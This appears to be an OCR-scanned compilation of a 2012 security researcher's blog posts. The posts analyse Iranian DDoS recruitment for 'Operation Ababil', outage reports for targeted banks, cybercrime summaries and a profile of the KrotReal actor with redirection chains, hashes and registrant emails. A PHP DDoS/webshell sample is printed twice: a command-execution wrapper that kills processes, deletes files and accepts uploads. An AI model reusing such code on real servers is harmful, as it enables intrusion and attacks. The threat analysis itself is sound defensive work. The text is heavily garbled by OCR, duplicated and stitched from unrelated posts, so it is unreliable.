Originally, the attack relied on a static recruitment message 
which included links to the DIY DDoS script lo¬ 
cated on 4shared.com and Mediafire.com. What's 
particularly interesting is the fact that the files were 
uploaded by a user going under the handle of" Marzi 
Mahdavi II". It's important to point out that these static links 
were 426 



1(5! Album* 


» Subscribe Message « ▼ 


Mao 


•ft worked at 
d Uves n Tehran, Iran 
• From Tehran, Iran 
9 Female 


About 


Work and Education 

OjlJj <U 


Info 


Do you know Marzi? 


rife 


^4 

37 


facebook 


w -< W • i 7 


Marzi Mahdavi II 


distributed as part of the recruitment campaign across 
multiple Muslim-friendly Facebook groups. 









Thanks to this fact, we could easily identify the user's 
Facebook account, and actually spot the original message 

seeking participation in the upcoming attacks. 

Marzi Mahdavi M's Facebook account: 

Sample shared Wall post seeking participation in the 
upcoming DDoS campaign: 
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A Marzi Mahdavi n Timeline ▼ How ▼ | 

; i. A jjj * *•> jl JLjl^juuO lj ^1 

I 3 

>i 0^>S JLJA U .ju*S l>^l lj Ol 9 tsjS ^Ija&jurl JjIS 09>i jl lj v9 

. jlAjljo CfcJlaS <ki £,sj-*±> «u)Ij>j Start Attack 










Sample blog post enticing users to participate: 
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Just like Attack to YouTube site you can Download the Links and run the web 
page and simply hit the Start at the time of Attack. 



Marzi Mahdavi II has once referenced a link pointing to the 
same blog, clearly indicating that he's following the 

ongoing recruitment campaigns across multiple Web sites: 

Second blog post enticing users to participate in the 
DDoS campaign: 
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According to YouTube administrator refusal to remove the prophet of Islam- 
insulting video, an internet group has developed a computer program - that is 
approved by Hilf-ol-Fozoul experts - to prevent the release of the video. 

When they run that program, YouTube will be impaired. 

For more influence of this action, it is necessary to run the program by a large 
number of users simultaneously. 

Tomorrow on 15 September at 4 pm. (Mecca Local Time) the action will begin. 
The considered file has been designed in html format. You can download it 
from links below: 

Link 1 



This very latest example of Iran's hacktivist community 
understanding of the cyber operations, once again lead me 

to the conclusion that what we've got here is either the fact 
that Iran's hacktivist community is lacking behind with years 
compared to sophisticated Eastern European hacking teams 
and cybercrime-friendly communities, or that Iran 

is on purposely demonstrating low cyber operation 
capabilities in an attempt to trick the Western world into 
thinking that it's still in a "catch up mode" with the rest of 
the world when it comes to offensive cyber operations. 

Did these coordinated DDoS campaigns actually had any 
impact on the targered web sites? According to data 

from the Host-Tracker, they seem to have achieved limited, 
but visible results, a rather surprising fact given the low 
profile DDoS script released by the campaigners. 










Sample Host-Tracker report for a targeted web site 
during the campaign: 
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host-tracker.com 


dart r»w* 

http://www.usbank.com 
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'Garment 
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Second Host-Tracker report for a targeted web site 
during the campaign: 


431 





•if. host-tracker.com ***■# 
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3 


c .*Jb*uhm fcr Ini' mwri atortt ard Ml nmferWy report! far hll|>: www.wi4>liwx|ux im 

n Kmrt IP I 
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9*) 

**t> 


r>ncn (#9 «f (imai)') 

tr r r ?; »ror 
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1*1 15168 13) 


•nr mfa.tiar* bed.miei e y CVrirpm 
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! error mb^_c«bt# Had.rTm.wgaP rrnoi-n 
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Quebec. Ci 
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SRi. Rvtiu error «*»> ..char* bad 
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♦«*> 
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151 151 68133 


Mu. IX U5 error Htp_c»n*bed_me e i a g e P-rero-i 
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151 15168 133 


Diln. TX US error Mt^>_cHar< ied.m na ay p.**ro<n> 
finer (• 9 ir»*pitted eof. ttmout)*) 
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Moninl 

error bad jr«»My<Tr*n<>-r> 
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Third Host-Tracker report for a targeted web site 
during the campaign: 
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host-tracker.com 

website monitoring service 



Tuesday, September 18, 2012 6:14:47 PM 

t 1)0 

Check result Pemmifit W; tt Tb dmk im* 

http://www.BankOfAmerica.com 

Check odier sitB: hupA Omk nw [ 

Subscrbe for free email alerts arid site availability reports for httpi/Vwww .BankOfAmerica.com 
typ* h*« Suber.t* 

Location Result Re *P ome kb sec IP Partner 

Size time 

Received responses: 14 Ok 32 Fail Average: 16 JO sec 0X10 

Http 

error:Htfo_client,Bad_message(Ur*nown 115 01 sec 171.199.100.173 

reason (e.g cneipected eof, timeout)') 


New York, NY, 
US 


«v< the largest me 

i 

Count of nodi 
Hosting Porto 


ASPT^I hostcry W. 
Add buttons to your sit 



IrrtvvKia wrcr: f^- c l^ t Bad_message<hJlnkricrv(n 
reason (e.g. ineipected eof, timeout)') 

Orlanrin R HBp 

' error:Http_clierit.Bad_message<''.r*riown 

reason (e.g. cneipectsd eof, timeout)*) 
Http 

Dallas, TX, us erra:Htfo_cllent.8ad_message('VJlnfcnown 
reason (e.g. cneipected eof, timeout)*) 


40.00sec 171.199.100.173 N icos ofthV 

80.50 sec 171.161.148.173 AptoHostr 

80.50 sec 171.199.100.173 ProvSov.N 


Htlp 

Kiev, Urane error :Http_cllent.Bad_message(\rtrx3wn 
reason (e.g cneipected eof, timeout)*) 

Http 

rmnyiam, : Mtlp_cl»erit-&ad_rnessage<^J»nfcr>owri 
reason (e.g. cneipected eof, timeout)*) 
Htlp 

Dallas, TX, US error :Htip_c lient.Bad_message(*tXf*T>own 
reason (e.g. cneipected eof, timeout)*) 

mi Http 

ansr19 ’ ’ error Http_client.Bad_message<T*known 
reason (e.g. cneipected eof, timeout)') 

Atlanta, GA, „ 

US 


80.51 sec 

40.00 sec 

40.00 sec 

40.00 sec 

0 65.22 sec 
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171.161.148.173 

0.00 171.199.228.173 


Custom Hostn 


RlOSGf 



Http 

Paris, France error :Htlp_client.Bad_messa 9 a{l>iJxywri 
reason (e.g. cneipected eof, timeout)*) 


40.00 sec 171.161.140.173 


Fourth Host-Tracker report for a targeted web site 
during the campaign: 
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host-tracker.com h «p" 

website monitoring service 


Check 


Saturday, September 15, 2012 8:02:50 PM 

1 13 □ 

Check result P«tm>ri«nt link to ihs ch»ck result 


http: //www. yo u tu be.com 

Check other site: hnptf ! Ctwi<now ] 


Subscribe fcr free email alerts and site availability reports for http://www.youtube.com 

typ* your-£»emad her* Subscrfce 

Location 

Result 

Page Size Response time 

KB/sec 

IP 
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Average: 

0.88 sec 

183.18 



Atlanta, GA, US 
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Ok 
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Http error:303 

0 

0.10 sec 
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Ok 
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NordGate networks 

Moscow. Russia 

Ok 
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0.67 sec 

261.83 

173.194.32.200 

JustHost 


Fifth Host-Tracker report for a targeted web site 
during the campaign: 
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Http 
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reason (e.g. unexpected eof, timeout)") 
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40.09 sec 
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Dallas, TX, US 

Toronto, ON, 
CA 


Ok 


Http 


254 21.12 sec 0.01 170.201.60.3 


Custo m Hostng 
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error:Http_cljent.Bad_message(*Unknown 
reason (e.g. unexpected eof, timeout)") 


40.00 sec 


170.201.60.3 OrryxNetUa 


Is the Iranian government really behind this campaign, or 
was it actually the work of amateurs with outdated 


and virtually irrelevant technical skills? Taking into 
consideration the previous [9]DDoS campaign launched 
by 

Iranian hacktivists in 2009, in this very latest one we 
once again see a rather limited understanding of cyber 













operations taking into consideration the centralized nature of 
the chain of command in this group. 

What's also worth pointing out is the fact that this is the first 
public appearance of the group that claims re¬ 
sponsibility for these attacks. Considering this and the lack 
of a strong digital fingerprint for the group in question, 
virtually anyone on the Internet can [10]engineer cyber 
warfare tensions between Iran and the U.S, by 
basically impersonating a what's believed to be an Iranian 
group. 

This post has been reproduced from [HJDancho 
Danchev's blog. Follow him [12]on Twitter. 
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Summarizing ZDNet's Zero Day Posts for August 
(2012-09-28 01:43) 

The following is a brief summary of all of my posts at 
[lJZDNet's Zero Day for August, 2012. You can subscribe 
to 

[2]Zero Day's main feed , or follow me on Twitter: 

01. [3]BlackBerry users targeted with malware-serving email 
campaign 

02. [4]Java zero day vulnerability actively used in targeted 
attacks 

03. [5]Loozfon Android malware targets Japanese female 
users 







04. [6]Researcher reports a CSRF vulnerability in Facebook's 
App Center, earns $5,000 

05. [7]Cybercriminals impersonate popular security vendors, 
serve malware 

This post has been reproduced from [8]Dane ho 
Danchev's blog. Follow him [9]on Twitter. 
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From Russia with iPhone selling 
affiliate networks 

September 27, 2012 - 12:00 am 
★ O 2 Votes 

By Dancho Danchev 

With affiliate networks continuing to represent among the few key growth factors of the cybercrwne 
ecosystem, it shouldn't be surprising that cybercnminals continue introducing new services and goods 
with questionab4t quality and somebmts unknown ongns on the market, with the idea to entice 
potential network participants into monetizing the traffic they can deliver through black hat SEO 
(Search Engme Optimization), malvertising, and spam campaigns. 

In this post. III profile a recently launched affiliate network selling iPhones that pnmanly targets 
Russian-speaking customers, and emphasizes the traffic acquisition scheme used by one of the 
network's participants. 

More details: 

Read More * 
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Summarizing Webroot's Threat Blog Posts for August 
(2012-09-28 01:54) 

The following is a brief summary of all of my posts at 
[l]Webroot's Threat Blog for August, 2012. You can 
subscribe to my [2]Webroot's Threat Blog RSS Feed 

or follow me on Twitter: 

01. [3]Spamvertised AICPA themed emails lead to Black Hole 
exploit kit 

02. [4]Spamvertised 'PayPal has sent you a bank transfer' 
themed emails lead to Black Hole exploit kit 

03. [5]Ongoing spam campaign impersonates Linkedln, 
serves exploits and malware 




04. [6]Millions of spamvertised emails lead to W32/Casonline 

05. [7]Cybercriminals impersonate AT &T's Billing Service, 
serve exploits and malware 

06. [8]IRS themed spam campaign leads to Black Hole 
exploit kit 

07. [9]Cybercriminals spamvertise bogus greeting cards, 
serve exploits and malware 

08. [10]Spamvertised 'Federal Tax Payment Rejected' 
themed emails lead to Black Hole exploit kit 

09. [lljSpamvertised 'Fwd: Scan from a Hewlett-Packard 
ScanJet' emails lead to Black Hole exploit kit 

10. [12]Spamvertised 'Royal Mail Shipping Advisory' themed 
emails serve malware 

11. [13]Cybercriminals impersonate Intuit Market, mass mail 
millions of exploits and malware serving emails 

12. [14]Cybercriminals spamvertise PayPay themed 
'Notification of payment received' emails, serve malware 

13. [15]Cybercriminals impersonate UPS, serve malware 

This post has been reproduced from [16]Dancho 
Danchev's blog. Follow him [17Jon Twitter. 
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New Russian DIY DDoS bot spotted in 
the wild 

September 28, 2012 - 12:00 am 
***** O 4 votes 

By Dancho Danchev 

Over the last couple of years, the modular and open source nature of today's modem DDoS 
(distributed denial of service) bots rievitabty resulted m the rise of the DDoS for hire and DDoS 
extortion monetization schemes within the cybercnme ecosystem. 

These maturing business models require constant innovation on behalf of the cybercnmmals providing 
the easy to use and manage DIY DDoS bots, the foundation of these busness models. What are some 
of the latest developments in this field? Are the malware coders behind these releases actually 
rtnovabng, or are they basically re-branding old malware bots and reintroducing them on the market? 
Let's find out. 

In this post, II profile a recently released DIY DOoS bot, which according to its author is a modification 

of the Dirt Jumper DDoS bot 
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Summarizing Webroot's Threat Blog Posts for 
September (2012-10-01 14:18) 

The following is a brief summary of all of my posts at 
[l]Webroot's Threat Blog for September, 2012. You can 
subscribe to my [2]Webroot's Threat Blog RSS Feed 

or follow me on Twitter: 

01. [3]Spamvertised 'Wire Transfer Confirmation' themed 
emails lead to Black Hole exploit kit 

02. [4]Intuit themed 'QuickBooks Update: Urgent' emails 
lead to Black Hole exploit kit 

03. [5]Cybercriminals resume spamvertising bogus greeeting 
cards, serve exploits and malware 





04. [6]Cybercriminals abuse Skype's SMS sending feature, 
release DIY SMS flooders 

05. [7]New Russian service sells access to thousands of 
automatically registered accounts 

06. [8]Spamvertised 'Your Fedex invoice is ready to be paid 
now' themed emails lead to Black Hole Exploit kit 
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07. [9]New Russian DIY SMS flooder using ICQ's SMS sending 
feature spotted in the wild 

08. [10]Spamvertised 'US Airways reservation confirmation' 
themed emails serve exploits and malware 

09. [ll]Cybercriminals impersonate FDIC, serve client-side 
exploits and malware 

10. [12]Managed Ransomware-as-a-Service spotted in the 
wild 

11. [13]A peek inside a boutique cybercrime-friendly E-shop 
- part four 

12. [14]New E-shop selling stolen credit cards data spotted in 
the wild 

13. [15]From Russia with iPhone selling affiliate networks 

14. [16]New Russian DIY DDoS bot spotted in the wild 

This post has been reproduced from [17]Dancho 
Danchev's blog. Follow him [18]on Twitter. 
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PHP Code: 


<?php error_reporting(0) ; 

♦base » dirname( _ FILE ). 

function stopedj) (cmdexec ("killall -9 perl; 
killall -9 perl-bin; 

Icillall -9 perl-cgi; 

"); 

unlink(♦base. "start.php”) ; 
unlink($base. "fl.pl") ; 
unlink($base. "run.pl") ; 
unlink($base. "startphp.php") ; 

print "<stopcleandos>Stop t Clean</stopcleandos>"; 
apache_child_terminate ( ); 

Jfunction OpXoadFile($File) {cffidexec("klllall -9 perl"); 
cadexec("killall -9 perl-bin"); 
cmdexecj "killall -9 perl-cgi’); 

$target_path 

$target_path = $targetjpath . basenamef $File( 'name' ]); 

@ aove_up1caded_f 1 1e($rlle [ 'txp_naae• ), $targetj?ath) ; 

Jfunction cadexec(5c»d) {if (function exists ( 'system* )) 8systein($cmd) ; 
elseif (function_exists( 'passthru' ) )Fpassthru($cmd) ; 
elseif (function_exists ( 'shell_exec' )) @shell_exec(Scmd) ; 
elseif (function_exists ( 'exec' ) ) 6exec(?cmd) ; 
elseif (function_exists ( 'popen' )) @popen($cmd, "r") ; 

}function curPageURLO {SpageURL = 'http'; 
if ($_SERVER [ "KTTPS” ] = "on") {SpageURL .= ”s"; 

ISpageURL .= 

if ($ SERVER ["SERVER PORT"] != ”80") {SpageURL .= S_SERVER [ "SERVER_NAME" S_SERVER [ "SERVER 
_PORT lr ] . S_SER , /ER [ "REQUEST URI * ] ; 

7 else {SpageURL .= S_SER7ER["SER , /ER_MS.ME"] .S_SERVER[”REQUEST_URI"] ; 

}return SpageURL; 

4 > 


Dissecting 'Operation AbabiP - an OSINT Analysis - 
Part Two (2012-10-26 15:36) 

With more crowd sou reed intelligence on "Operation Ababil" 
published in the recent weeks, it's time to revisit the 
campaign's core strategy for harnessing enough bandwidth 
to successfully take down major U.S financial institutions. 

As you can remember, in [l]Part One of the OSINT 
analysis for "Operation Ababil" I emphasized on the 
crowdsourcing campaign launched by Izz ad-Din al-Qassam 
a.k.a Qassam Cyber Fighters, which led to the successful 

DDoS attack against these institutions. It appears that this is 
just one of the many stages of the campaign. 

According to security researchers from Proxelic, the attackers 
also relied on [2]a PHP based DDoS attack script known 
as "itsoknoproblembro" that was installed on servers 
susceptible to exploitation through the Bluestork Joomla 





template. By combining crowd sou reed bandwidth and 
bandwidth from the compromised servers, the attackers 

managed to successfully achieve their objectives. 

The DDoS script in question,"itsoknoproblembro", has been 
publicly available as a download for months be¬ 
fore the attacks started, indicating that it was not on 
purposely coded to be used in the campaign against major 
U.S 

financial institutions. 

Detection rate: PHP _DDoS.html - [3]MD5: 
9ebab9f37f2bl7529ccbcdf9209891be - detected by 9 
out of 44 antivirus scanners as PHP/Obfuscated.F; 
Heuristic.BehavesLike.JS.Suspicious. A 

Next to Prolexic's claims, [4]th3j35t3r also published an 
analysis of the situation that's primarily relying on wishful 
thinking and social engineering, claiming that Anonymous 
supplied the operators of "Operation Ababil" with DDoS 
bandwidth by using a service called Multiboot.me - 
108.162.193.85; 108.162.193.185, AS13335. 

Sample screenshots of the Multiboom.me's GUI: 
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With "Operation Ababil" continuing to fuel political tensions 
between the U.S and Iran, which is blamed for organizing the 
launching these attacks, it's worth emphasizing on the basics 

of [5]'false-flag f cyber operations, and 

[6]"aggregate-and-forget" type of botnets. 

When was the first time you heard of Izz ad-Din al-Qassam 
a.k.a Qassam Cyber Fighters? Appreciate my rhetoric - 

right after they started their crowdsourcing campaign. With 
the group lacking any significant digital fingerprint prior to 
these attacks, virtually anyone can localize their objectives 
with a little twist of politics and propaganda, and easily set 
the foundations for what is now perceived as an Iranian cyber 
operation. 













Moreover, their bandwidth acquisition techniques clearly 
indicate that the attackers are aware of the dynam¬ 
ics of modern cyber operations in general, and by doing so, 
chose to acquire bandwidth without outsourcing their 

needs to ubiquitous and sophisticated [7]Russian DDoS on 
demand services, which could have led to the easy 

identification of the service in question, next to the 
cybercriminals behind it. 

Updates will be posted as soon as new intel becomes 
available. 

This post has been reproduced from [8]Dane ho 
Danchev's blog. Follow him [9]on Twitter. 

1. http://ddanchev.blo as pot.com/2Q12/Q9/dissectin a- 
o peration-ababil-osint.html 

2 . 

http://www.darkreadin a .com/advanced- 
th reats/167901091/securit v/ peri meter- 
securitv/240008534/serious-attac 

kers-paired-with-online-mob-in-bank-attacks.html 

3. 

https://www.virustotal.com/file/3602cl60Qf47da49795b9dd7 

ed353beab37399fbe6565fe4b558455b285b04ee/analvsis/ 

1351213681/ 

446 


4 . 

















http://webcache. ci oo a leusercontent.com/search? 
hl=en&tbo=d&biw=1366&bih = 667&sclient= psv- 

ab&q=cache%3Ahttp%3 

A%2F%2Fth3 i 35t3r.wordoress.com%2F2Q12%2FQ9%2F26% 

2Fanon v 

5. http://www.zdnet.com/blo a /securitv/should-a-tar a eted- 
countrv-strike-back-at-the-cvber-attackers/6194 

6. http://ddanchev.blo as pQt.com/2Q09/ll/pricin a -scheme- 
for-ddos-extortion.html 

7. http://blo a .webroot.com/2012/06/06/ddos-for-hire- 
services-offerin a -to-take-down-vour-com oetitors-web-site 

s-a oin a -mainstream/ 

8. http://ddanchev.blo as oot.com/ 

9. http://twitter.com/danchodanchev 


447 



































PHP Code: 


<?php error_reporting(0) ; 

♦base » dirname( _ FILE ). 

function stopedj) (cmdexec ("killall -9 perl; 
killall -9 perl-bin; 

Icillall -9 perl-cgi; 

"); 

unlink(♦base. "start.php”) ; 
unlink($base. "fl.pl") ; 
unlink($base. "run.pl") ; 
unlink($base. "startphp.php") ; 

print "<stopcleandos>Stop t Clean</stopcleandos>"; 
apache_child_terminate ( ); 

Jfunction OpXoadFile($File) {cffidexec("klllall -9 perl"); 
cadexec("killall -9 perl-bin"); 
cmdexecj "killall -9 perl-cgi’); 

$target_path 

$target_path = $targetjpath . basenamef $File( 'name' ]); 

@ aove_up1caded_f 1 1e($rlle [ 'txp_naae• ), $targetj?ath) ; 

Jfunction cadexec(5c»d) {if (function exists ( 'system* )) 8systein($cmd) ; 
elseif (function_exists( 'passthru' ) )Fpassthru($cmd) ; 
elseif (function_exists ( 'shell_exec' )) @shell_exec(Scmd) ; 
elseif (function_exists ( 'exec' ) ) 6exec(?cmd) ; 
elseif (function_exists ( 'popen' )) @popen($cmd, "r") ; 

}function curPageURLO {SpageURL = 'http'; 
if ($_SERVER [ "KTTPS” ] = "on") {SpageURL .= ”s"; 

ISpageURL .= 

if ($ SERVER ["SERVER PORT"] != ”80") {SpageURL .= S_SERVER [ "SERVER_NAME" S_SERVER [ "SERVER 
_PORT lr ] . S_SER , /ER [ "REQUEST URI * ] ; 

7 else {SpageURL .= S_SER7ER["SER , /ER_MS.ME"] .S_SERVER[”REQUEST_URI"] ; 

}return SpageURL; 

4 > 


Dissecting 'Operation AbabiP - an OSINT Analysis - 
Part Two (2012-10-26 15:36) 

With more crowd sou reed intelligence on "Operation Ababil" 
published in the recent weeks, it's time to revisit the 
campaign's core strategy for harnessing enough bandwidth 
to successfully take down major U.S financial institutions. 

As you can remember, in [l]Part One of the OSINT 
analysis for "Operation Ababil" I emphasized on the 
crowdsourcing campaign launched by Izz ad-Din al-Qassam 
a.k.a Qassam Cyber Fighters, which led to the successful 

DDoS attack against these institutions. It appears that this is 
just one of the many stages of the campaign. 

According to security researchers from Proxelic, the attackers 
also relied on [2]a PHP based DDoS attack script known 
as "itsoknoproblembro" that was installed on servers 
susceptible to exploitation through the Bluestork Joomla 





template. By combining crowdsourced bandwidth and 
bandwidth from the compromised servers, the attackers 

managed to successfully achieve their objectives. 

The DDoS script in question,"itsoknoproblembro", has been 
publicly available as a download for months be¬ 
fore the attacks started, indicating that it was not on 
purposely coded to be used in the campaign against major 
U.S 

financial institutions. 

Detection rate: PHP _DDoS.html - [3]MD5: 
9ebab9f37f2bl7529ccbcdf9209891be - detected by 9 
out of 44 antivirus scanners as PHP/Obfuscated.F; 
Heuristic.BehavesLike.JS.Suspicious. A 

Next to Prolexic's claims, [4]th3j35t3r also published an 
analysis of the situation that's primarily relying on wishful 
thinking and social engineering, claiming that Anonymous 
supplied the operators of "Operation Ababil" with DDoS 
bandwidth by using a service called Multiboot.me - 
108.162.193.85; 108.162.193.185, AS13335. 

Sample screenshots of the Multiboom.me's GUI: 
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With "Operation Ababil" continuing to fuel political tensions 
between the U.S and Iran, which is blamed for organizing the 


launching these attacks, it's worth emphasizing on the basics 

of [5]'false-flag' cyber operations, and 

[6] M aggregate-and-forget M type of botnets. 

When was the first time you heard of Izz ad-Din al-Qassam 
a.k.a Qassam Cyber Fighters? Appreciate my rhetoric - 

right after they started their crowdsourcing campaign. With 
the group lacking any significant digital fingerprint prior to 
these attacks, virtually anyone can localize their objectives 
with a little twist of politics and propaganda, and easily set 
the foundations for what is now perceived as an Iranian cyber 
operation. 

Moreover, their bandwidth acquisition techniques clearly 
indicate that the attackers are aware of the dynam¬ 
ics of modern cyber operations in general, and by doing so, 
chose to acquire bandwidth without outsourcing their 

needs to ubiquitous and sophisticated [7]Russian DDoS on 
demand services, which could have led to the easy 

identification of the service in question, next to the 
cybercriminals behind it. 

Updates will be posted as soon as new intel becomes 
available. 

This post has been reproduced from [8]Dancho 
Danchev's blog. Follow him [9]on Twitter. 
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Summarizing ZDNet's Zero Day Posts for October 
(2012-11-02 01:47) 

The following is a brief summary of all of my posts at 

[1] ZDNet's Zero Day for October, 2012. You can subscribe 
to 

[2] Zero Day's main feed , or follow me on Twitter: 

01. [3]Report: Large US bank hit by 20 different crimeware 
families 

02. [4]Localized Dorkbot malware variant spreading across 
Skype 

03. [5]Sopelka botnet drops Citadel, Feodo, and Tatanga 
crimeware variants 

04. [6]Adobe patches 6 critical security flaws in Shockwave 

This post has been reproduced from [7]Dancho 
Danchev's blog. Follow him [8Jon Twitter. 

1. http://zdnet.com/blo a /securit v 
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3. http://www.zdnet.com/reoort-lar a e-us-bank-hit-bv-20- 
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4. http://www.zdnet.com/localized-dorkbot-malware-variant- 

s preadin a -across-sk v pe-7000006021/ 

5. http://www.zdnet.com/sooelka-botnet-droos-citadel-feodo- 
and-tatan a a-crimeware-variants-7000006260/ 

6. http://www.zdnet.com/adobe-patches-6-critical-securit v- 
flaws-in-shockwave-7000006272/ 
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Summarizing Webroot's Threat Blog Posts for 
October (2012-11-02 02:34) 

The following is a brief summary of all of my posts at 
[lJWebroot's Threat Blog for October, 2012. You can 
subscribe to my [2]Webroot's Threat Blog RSS Feed 

or follow me on Twitter: 

01. [3]Russian cybercriminals release new DIY SMS flooder 

02. [4]Upcoming Webroot presentation on Cyberjihad and 
Cyberterrorism at RSA Europe 2012 






















03. [5]Recently launched E-shop sells access to hundreds of 
hacked PayPal accounts 

04. [6]New Russian service sells access to compromised 
Steam accounts 

05. [7]'Vodafone Europe: Your Account Balance' themed 
emails serve malware 

06. [8]Cybercriminals impersonate UPS, serve client-side 
exploits and malware 

07. [9]'Your video may have illegal content' themed emails 
serve malware 
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08. [10]Cybercriminals spamvertise 'Amazon Shipping 
Confirmation' themed emails, serve client-side exploits and 
malware 

09. [ll]American Airlines themed emails lead to the Black 
Hole Exploit Kit 

10. [12]Bogus Facebook notifications lead to malware 

11. [13]Spamvertised 'KLM E-ticket' themed emails serve 
malware 

12. [14]'lntuit Payroll Confirmation inquiry' themed emails 
lead to the Black Hole exploit kit 

13. [15]Malware campaign spreading via Facebook direct 
messages spotted in the wild 

14. [16]'Regarding your Friendster password' themed emails 
lead to Black Hole exploit kit 



15. [17]Russian cybercriminals release new DIY DDoS 
malware loader 

16. [18]PayPal 'Notification of payment received' themed 
emails serve malware 

17. [19]Cybercriminals impersonate Delta Airlines, serve 
malware 

18. [20]'Your UPS Invoice is Ready' themed emails serve 
malware 

19. [21]Bogus Skype 'Password successfully changed' 
notifications lead to malware 

20. [22]RSA Conference Europe 2012 - recap 

21. [23]Cybercriminals impersonate Verizon Wireless, serve 
client-side exploits and malware 

22. [24]Spamvertised 'BT Business Direct Order' themed 
emails lead to malware 

23. [25]Cybercriminals spamvertise millions of British 
Airways themed e-ticket receipts, serve malware 

24. [26]Cybercriminals spamvertise millions of bogus 
Facebook notifications, serve malware 

25. [27]Nuclear Exploit Pack goes 2.0 

This post has been reproduced from [28]Dancho 
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Managed Embedding of Malicious iFrames Through 
Compromised Accounts as a Service (2012-11-24 
00:55) a 

This post has been reproduced from [lJDancho 
Danchev's blog. Follow him [2Jon Twitter. 

1. http://ddanchev.blo as oot.com/ 

2. http://twitter.com/danchodanchev 
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Koobface Botnet Master KrotReal Back in Business, 
Distributes Ransomware And Promotes BHSEO Ser¬ 
vice/Product (2012-11-26 03:52) 

On January 09, 2012 I exposed [lJKoobface botnet 
master KrotReal. On January 16, 2012, [2]The New York 
Times went public with data from Facebook Inc. 

exposing the identities of the rest of the group. What 
happened? With the botnet masters still at large, and the 
Koobface botnet currently offline, a logical question emerges 
- what are 

these cybercriminals up to now that they're no longer 
involved in managing Koobface? 

Cybercrime as usual! 

Continuing to [3]squeeze the cybercrime ecosystem, 

and keep known bad actors on a short leash, in this in¬ 
telligence brief I'll expose [4]Anton Nikolaevich 
Korotchenko a.k.a KrotReal's s latest activities, 
indicating that he's currently busy experimenting with two 
projects: 

• A Black Hat (SEO) Search Engine Optimization related 
service/product 

• Underground traffic exchange/pay-pay-install network 
currently distributing localized Ransomware 

Just like the case when KrotReal's real life identity was 
revealed due to a single mistake he made over a period of 



several years, namely to register a Koobface command and 
control server using his personal GMail account, in this 

intelligence brief I'll once again expose his malicious and 
fraudulent activities by profiling two of the most recently 
domains he once again registered with his personal GMail 
account. 

Let's start by profiling his Black Hat SEO service/product, 
currently hosted on one of the domains he registered in 
2011 . 

trafficconverter.in - 176.9.146.78 - Email: 
krotreal@gmail.com 

Created On:28-Jul-2011 12:37:45 UTC 

Last Updated On:28-Jun-2012 08:11:43 UTC 

Expiration Date:28-Jul-2013 12:37:45 UTC 
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The service/produce apparently allows the systematic abuse 
of legitimate blogging platforms such as Google's 

Blogger and Wordpress, next to Yoom CMS. KrotReal himself 
might be using the tool, or sell/offer access to it as a 

managed service. Does this mean he's not using it by himself 
to monetize the hijacked legitimate traffic that he's 

able to obtain through his Black Hat SEO campaigns? Not at 
all. 


More domains presumably to be used for Black Hat SEO 
purposes registered with KrotReal's personal email 

account (krotreal@gmail.com): 

superstarfind.com 

celeb-search.com 

myown-search.com 

myfindstuff.com 

network-find.com 

coolfind200309.com 

experimentsearch.com 

fashion-overview.com 
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krotpong.com 

adultpartypics.com 

findhunt.com 

How is he actually monetizing the hijacked traffic? Keep 
reading. Now it's time to expose his malicious activi¬ 
ties in the form of spreading localized Ransomware variants. 
For the record, [5]the Koobface gang distributed 

primarly scareware - there's evidence that the group was 
also involved in other [6]malicious campaigns - and even 


[7]bragged about the fact that they're not damaging 
infected user PCs. 

What's particularly interesting about profiling this campaign, 
is that it's a great example of double-layer mone¬ 
tization, as KrotReal is earning revenue through the Traffic 
Holder Adult Affiliate Program, in between serving 

client-side exploits and ultimately dropping Ransomware on 
the affected host using the same redirection chain. 

Sample malicious domain name reconnaissance: 

traffictracker.in - 176.9.146.78 (AS24940) - Email: 
krotreal@gmail.com 

Created On:22-Nov-2011 13:42:53 UTC 

Last Updated On:22-Nov-2012 22:33:25 UTC 

Expiration Date:22-Nov-2013 13:42:53 UTC 

Responding to the same IP 176.9.146.78 (AS24940): 

allcelebrity.ru 

easypereezd.ru 

Sample malicious activity redirection chain: 

hxxp://traffictracker. in/in. cgi?l 1 &parameter=nude+girls 
&CS=1 

-> 

hxxp://celeb-search. com/in. php?source=th 
&q=nude+girls 



-> 

hxxp://celeb-search. com/in3.php ?source=th 

&q=nude+girls -> hxxp://www. trafficholder.com/in/in2.php? 
ppillow-pics _erotic -> hxxp://hit. trafficholder. com/cgi- 
bin/traffic/process.fcgi?a=ppillow &c=l &n=pics_erotic &r= 
-> hxxp.-//gravityexp.com/go.php?sid=12 -> 
hxxp://nosnowfevere.com/ZqRqk (exploiting [8]CVE-2008- 
5353) -> hxxp://nosnowfevere.com/oxsXAE?KpDzQ=61 -> 
hxxp://nosno wfe i /ere. com/ZqRqk - > 
hxxp://nosno wfe i /ere. com/EHSvFc - > 
hxxp://nosno wfe i /ere. com/XMDrkH 

KrotReal's Traffic Holder Adult Affiliate Network ID is ppillow- 
pics _erotic. 
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Malicious domain names reconnaissance: 
gravityexp.com 


returns 

"Digital 

River 

GmbH" 

on 


its 


home 


page 

46.163.117.144 

Email: 

francesca.muglia.130@istruzione.it 

Updated Date: 30-aug-2012 

Creation Date: 30-aug-2012 

Expiration Date: 30-aug-2013 

nosnowfevere.com - 91.211.119.32 - Email: 
djbroning@definefm.com 

Updated Date: 25-nov-2012 

Creation Date: 25-nov-2012 

Expiration Date: 25-nov-2013 

Upon successful client-side exploitation, the campaign drops 

[9]MD5: d234a238eb8686d08cd4e0b8b705dal4 

- detected by 10 out of 43 antivirus scanners as 
Trojan. Win lock.7431 

Sample screenshot displayed to users from 
geolocated countries: 
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Second screenshot of a sample page displayed to 
affected U.K users: 
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Additional malicious payload obtained from the 
campaign: 

[10] MD5: fd47fe3659d7604d93c3ce0c0581fed7 - 

detected by 4 out of 44 antivirus scanners as 
Exploit:Java/CVE- 

2012-5076.BBW 

[11] MD5: e47991d7fl72e893317f44ee8afe3811 - 

detected by 5 out of 44 antivirus scanners as JS:Pdfka-gen 
[Expl] 

[12] MD5: 7e58703026c7ffba05ac0d2ae4d3c62f - 

detected by 5 out of 44 antivirus scanners as 
Exploit:Java/CVE- 

2012-1723!generic 

Ransomware C &C malicious domain name 
reconnaissance: 

sarscowoy.com - currently responds to 176.28.22.32 
(AS20773); 176.28.14.42 (AS20773) - Email: 
rmasela@ymail.com On 2012-06-21 the domain responded 
to 204.13.160.28 (AS33626), then on 2012-07-01 it changed 
IPs to 

46.163.113.79 (AS20773), then again on 2012-11-14 it 
changed IP to 176.28.14.42 (AS20773), followed by one last 


change on 2012-11-24 to 176.28.22.32 (AS20773) 

One more MD5 is known to have phoned back to the same 
Ransomware C &C URL - [13]MD5: 

1600577edecelefellc75158f9dd24db detected by 28 
